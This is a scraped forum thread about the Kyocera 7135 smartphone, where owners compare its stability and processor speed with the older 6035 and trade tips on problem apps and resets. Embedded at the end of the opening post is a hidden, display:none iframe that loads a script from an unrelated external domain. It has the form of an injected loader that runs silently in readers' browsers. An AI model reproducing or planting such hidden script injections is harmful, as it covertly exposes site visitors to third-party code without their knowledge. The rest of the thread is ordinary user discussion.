+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: 7135 Stability?

7135 Stability? How about Speed?

Hi all,

I haven't purchased a 7135 yet. However, I'm slightly discouraged by some of the stability issues I've been reading about. If I wanted to reboot my phone all the time I'd buy a MS device. On average, are most people having stability problems with their 7135s? Or are these unique occurences that I'm reading about?

edited: How about the speed of the phone? Is it any more sluggish than the 6035? I can live with speed around the same as the 6035, but any slower and I doubt I'd be able to live with it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Too converged to post much priapism's Avatar

The only problem I've had...

using the phone extensively this weekend is that:

When the phone is powered off and I try to make an application dial the internet via the QNC connection and I am in an area where I have no service (like deep in the bowels of the VA hospital... ) I get the inverse screen lockup.

That's it. Not really a big deal. I was able to reproduce the problem... I imagine the instabilities we're experiencing are some of the reasons that Verizon has held up the release. They'll probably be fixed soon....

Priapism

I haven't had what I'd call a problem with stability. After a little installation trouble (didn't use the CD), my lockups have been caused by 3rd party sw pkgs.

The only "reverse screen" lockup I have had was trying to use a ringer that I had already deleted. Duh!

Rest assured, this puppy is much more stable than the 6035. The only lock-ups I've seen first hand and read about on this board are due to very idosyncratic behavior when you're trying to do something pretty funky. The normal operation is very good.

That said, I am absolutely sure the version that Verizon will release will be even better. The real question is whether the delays were caused by software/firmware or hardware. If it's hardware, all of us early adopters will need to do a real song and dance to get a swap!

My advice, if you haven't already plunged - wait for VZW, as painful as it is.

There are some issues

My phone has issues with locking up during phone (not palm) usage. As for myself, I chalk it up to being an early adaptor. If you haven't already, read my post here:
    [url http://www.smartphonesource.com/vbul...6580#post46580[/url]

I agree, the 7135 is way more stable than the 6035. I have many programs and some hacks, and have had to reset on occasion. I say don't wait, get it!

Administrator
    Originally posted by dgelfuso
    I agree, the 7135 is way more stable than the 6035. I have many programs and some hacks, and have had to reset on occasion. I say don't wait, get it!
    YMMV, but i have had the 6035 since march 2001 and never had a fatal error resulting in a cold reset.. and i have the original firmware that came with the phone... cant beat that!

I am surprised to hear all the troubles with stability because I've had very few problems.

my phone works fine as long as i remember to respect its slow processor, only asking it to do 1 thing at a time. ive had about 3 crashes, usually due to my impatientence. (sp)

Originally posted by marctronixx
    YMMV, but i have had the 6035 since march 2001 and never had a fatal error resulting in a cold reset.. and i have the original firmware that came with the phone... cant beat that!
    That's probably because you gave it up for an I-300 LONG ago.
    ~'kito
    pdaPhoneHome Moderator

Folks,

I've posted several threads about the stability. As long as you stay away from a few situations, the phone seems to be rock solid -- I have not required a soft reset in a week.

Those situations are:

1) Seems like some programs that handle alarms cause problems (Datebk5 for sure).

2) When using Express Network with the PDA or Laptop, switching in and out of the phone application and FaxModem application seem to cause problems. If you simply use Express Network, shut it down afterwards, then use the phone normally you should be OK.
    3) When using Express Network via a laptop and the FaxModem app, the phone side seems to occasionally leave the USB port in a strange state requiring a soft reset to HotSync again.

Glenn

The only hard reset I've had was due to the program BATTERY LOG which drained my battery so fast it wasn't funny. I've had soft reset problems with Kinoma Player, but I knew that program didn't claim to work with the 7135 yet. If you don't try to push the envelope with your 7135 you shouldn't have any trouble.

Originally posted by marctronixx
    Me too Marc... I have not had to reset my 6035 either, but then again, it has been in the box the past 18 months while I have had my i300. I suspect you have been doing the same!
    Carl

[q]The only "reverse screen" lockup I have had was trying to use a ringer that I had already deleted. Duh![/q]

How do you get a "reverse screen"? I always get fatal alerts when I do that. Do you have something installed that causes you to get reverse screens instead of fatal alerts?

Administrator
    Originally posted by CarlGalgano
    Me too Marc... I have not had to reset my 6035 either, but then again, it has been in the box the past 18 months while I have had my i300. I suspect you have been doing the same!
    actually, my finace has been using the 6035 ever since i got the i300 in october 2001.. when i got the 330 she wanted the i300 so for the past 2 months the 6035 has been sititng here in the drawer..

A Question for 7135 Owners....

Or those who anticipate being owners (still) at this point.

I guess this is as appropriate place to post this as any other: I have been noticing quite a few comments about the processor speed as an issue. As a current Sprint customer, I have re-taken a long look at the features of other smart(?) phones out there, and still feel like this one serves my needs the best. However, I won't be able to buy this one, and then run out and buy the next great 700 dollar phone in 6 or 8 months. I am ready to buy now (5 months ago!!)

I guess my point is, how much of an issue is the processor speed likely to be? I have been reading some of the posts, but wanted to talk about this specifically. So--discuss! (In relatively low tech speak please....)

Thanks,
    Beth

Re: A Question for 7135 Owners....

Originally posted by lurkingforinfo
    Or those who anticipate being owners (still) at this point.

I guess this is as appropriate place to post this as any other: I have been noticing quite a few comments about the processor speed as an issue. As a current Sprint customer, I have re-taken a long look at the features of other smart(?) phones out there, and still feel like this one serves my needs the best. However, I won't be able to buy this one, and then run out and buy the next great 700 dollar phone in 6 or 8 months. I am ready to buy now (5 months ago!!)

I guess my point is, how much of an issue is the processor speed likely to be? I have been reading some of the posts, but wanted to talk about this specifically. So--discuss! (In relatively low tech speak please....)

Thanks,
    Beth
    I think it all depends on what you expect to use the phone for. I moved up from a PalmIIIc, so for me, there is an improvement. On the other hand, I am trying to do things that I never tried on the PalmIIIc, and I can see that the processor is having an effect. The biggest issue seems to be with Express network web browsing. The data is received just fine, but if there are graphics, I need to sit and wait for the screen to render them long after the data is received. The Photosuite application seems to really bog down, but I have now heard that there may be better programs (snaphoto?) that is faster, but I could see this benefiting from a faster processor. If viewing moves was an issue for me, I am sure that a faster processor would be helpful there too.

I use Delorme XmapHH for mapping amd route finding, and it is very "processor hungry" so I would probably get better performance with a faster processor, but it is much better then it was on the PalmIIIc, so I am not really complaining.

For more standard palm applications, I just don't think 33 mhz will be an issue.

Alan

Thanks for your input Alan!! Much appreciated!

B.

Re: Re: A Question for 7135 Owners....

Originally posted by alanb
    but I have now heard that there may be better programs (snaphoto?) that is faster...
    Alan,

SplashPhoto:
    http://www.handango.com/PlatformProd...1&genDemo=GEN3
    ~'kito
    pdaPhoneHome Moderator